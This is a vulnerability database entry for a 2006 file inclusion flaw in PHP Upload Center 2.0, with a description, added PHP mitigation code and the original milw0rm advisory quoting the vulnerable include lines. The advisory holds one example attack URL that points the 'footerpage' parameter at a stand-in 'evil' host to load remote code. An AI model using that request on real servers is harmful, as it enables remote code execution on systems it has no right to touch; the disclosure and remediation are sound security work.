Vendor: PHP Upload Center
By: GregStar
CVSS: 7.5 (HIGH)
Class: Remote/Local File Inclusion
CWE: 98
Product Name: PHP Upload Center
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:php_upload_center:php_upload_center_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Coding 4 Fun

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'language' and 'footerpage' parameters to the 'activate.php' script. This can be exploited to include arbitrary local and remote files by passing directory traversal strings to the 'language' parameter and a URL to the 'footerpage' parameter.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
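
One way to apply this to the two include statements in 'activate.php' quoted in the raw advisory below, as an added example that is not PHP Upload Center's own code or its patch. It assumes the 'language' and 'footerpage' parameters reach the script as request-populated globals (for example through register_globals), and the helper names and language list are hypothetical.

```php
<?php
// Added example for PHP 7.1+, not PHP Upload Center's own code or patch.
// ALLOWED_LANGUAGES, DEFAULT_LANGUAGE, resolve_language() and resolve_page()
// are hypothetical names; the language list is constructed.
const ALLOWED_LANGUAGES = ['en', 'pl'];
const DEFAULT_LANGUAGE  = 'en';          // stands in for $dft_language

// Map the request value onto a fixed list. Traversal strings, "conf",
// arrays and empty values all fall back to the default.
function resolve_language($requested): string
{
    if (is_string($requested) && in_array($requested, ALLOWED_LANGUAGES, true)) {
        return $requested;
    }
    return DEFAULT_LANGUAGE;
}

// Return the absolute path of $page only if it is an existing file under
// $appRoot/include; URLs and paths that climb out of it give null.
function resolve_page(string $appRoot, $page): ?string
{
    $allowed = realpath($appRoot . '/include');
    $real    = is_string($page) ? realpath($appRoot . '/' . $page) : false;
    if ($allowed === false || $real === false || !is_file($real)) {
        return null;
    }
    return strpos($real, $allowed . DIRECTORY_SEPARATOR) === 0 ? $real : null;
}

// Replacement for lines 66-70: read the parameter explicitly and validate it.
$language = resolve_language($_GET['language'] ?? null);

// The page paths belong to the language file, so drop anything that was
// registered from the request before loading it.
$headerpage = $footerpage = $infopage = null;
$languageFile = __DIR__ . "/include/{$language}.php";
if (is_file($languageFile)) {
    require $languageFile;               // sets $headerpage, $footerpage, $infopage
}

// Replacement for line 164: include the footer only after the path check.
$footer = resolve_page(__DIR__, $footerpage);
if ($footer !== null) {
    include $footer;
}
```

On PHP versions that still offer them, turning off register_globals and allow_url_include in php.ini closes the same paths at the configuration level.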

Exploit-DB raw data:

*************************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
*************************************************************************************************************************
													  		 
* Name = PHP Upload Center v2.0 ; 											 
													  		 
* Class = Remote/Local File Inclusion ;											 
															 
* Download = http://skrypty.webpc.pl/pobierz.php?id=58 ;				 			         
													  		 
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 
												  	  		 
-------------------------------------------------------------------------------------------------------------------------
													  		 
Vulnerable Code in activate.php												 
															 
line 66-70														 
															 
...															 
															 
if (!isset($language))
  $language=$dft_language;
if ($language=="")
  $language=$dft_language;
require("include/${language}.php"); <== Local incl.
															 
...															 
	

line 164

...

include($footerpage);  <== Remote incl.

...


Code in include/en.php (and other language files)

line 5-7

...

$headerpage="include/header.htm";
$footerpage="include/footer.htm"; <==
$infopage="include/info.htm";

...

												  		 
- Ex. :	

  														 
 http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?								 
															 
															 
															 
															 
*************************************************************************************************************************
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 
												          		 
*************************************************************************************************************************

# milw0rm.com [2006-12-03]